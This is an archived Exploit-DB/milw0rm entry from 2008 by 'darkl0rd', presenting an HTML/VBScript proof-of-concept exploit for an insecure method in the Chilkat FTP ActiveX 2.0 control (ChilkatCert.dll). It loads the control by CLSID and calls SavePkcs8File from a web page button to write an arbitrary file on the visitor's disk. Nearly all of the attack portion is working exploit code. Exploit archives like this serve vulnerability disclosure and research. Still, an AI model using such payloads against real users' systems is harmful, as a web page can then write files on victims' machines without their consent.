Chilkat FTP ActiveX 2.0 - 'ChilkatCert.dll' Insecure Method

EDB-ID:

5028


Author:

darkl0rd

Type:

remote


Platform:

Windows

Date:

2008-01-31


<body bgcolor="#000000">

<div align="center">

<pre><code><span style="font: 10pt verdana;"><font color="#00FF00">=======================================================================
</font></div><center>
 <h1 id="product"><font color="#00FF00" size="2">Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method</font><font face="Verdana" color="#00FF00"><br><br><font size="2"> Web site : <a href="http://www.chilkatsoft.com"><font color="#00FF00">www.chilkatsoft.com</font></a></font></font><font color="#00FF00"><br></font><font face="Verdana" color="#00FF00"><br><font size="2">=======================================================================</font></font></span><font color="#00FF00"><br><span style="font-style:normal; font-variant:normal; font-size:10pt; font-family:Verdana; font-weight:700">Author: darkl0rd<br> <br>E-mail: l_l_darkl0rd_l_l@yahoo.com</span><br><span style="font-style:normal; font-variant:normal; font-weight:normal; font-size:10pt; font-family:Verdana"><br> Tested on Windows XP Professional SP2 , with Internet Explorer 6</span></font></h1><p id="product"><font color="#FF0000">Class privateKey</font><font color="#00FF00"><br></font><font color="#FF0000">GUID: {A934AEE3-8896-485F-8A55-ACF2A87BD010}<br>Number of Interfaces: 1<br>Default Interface: IPrivateKey</font></p><p id="product"><font color="#FF0000">SavePkcs8File</font></p></center>

<div align="center"><font color="#00FF00"><object classid='clsid:A934AEE3-8896-485F-8A55-ACF2A87BD010' id='over' align="left" width="1" height="2"></object>
<input language=VBScript onclick=lose() type=button value="Exploit">

<script language='vbscript'>
 Sub lose
   mystr="c:\darkl0rd.txt"
   over.SavePkcs8File mystr
   MyMsg = MsgBox(" Done ! ")
 End Sub
</script>
</span></span>

</font></code></div></p>
</pre>

# milw0rm.com [2008-01-31]